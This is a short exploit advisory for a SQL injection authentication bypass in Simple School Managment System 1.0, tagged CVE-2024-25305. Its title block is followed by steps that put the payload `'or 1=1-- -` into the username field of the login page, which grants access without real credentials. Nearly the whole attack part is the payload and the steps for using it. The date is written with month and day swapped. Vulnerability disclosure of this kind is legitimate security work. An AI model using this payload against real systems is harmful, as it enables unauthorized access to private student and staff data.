- Exploit Title: Simple School Managment System - Authentication Bypass
- Date: 2024-30-01
- Exploit Author: Tuba Kavgacı
- Vendor Homepage: https://code-projects.org/simple-school-management-in-php-with-source-code/
- Software Link: https://download.code-projects.org/details/d10e92aa-e37f-46fd-9bf8-45878956d7c0
- Version: 1.0
- Tested on: Kali Linux + PHP 8.2.12, Apache 2.4.58
- CVE: CVE-2024-25305
Simple School Managment System 1.0 allows Authentication Bypass via the username and password parameters at "http://localhost/School/".
- Go to this address: "http://localhost/School/index.php"
- username :
'or 1=1-- -password :1and log in - Authentication Bypass Successful !
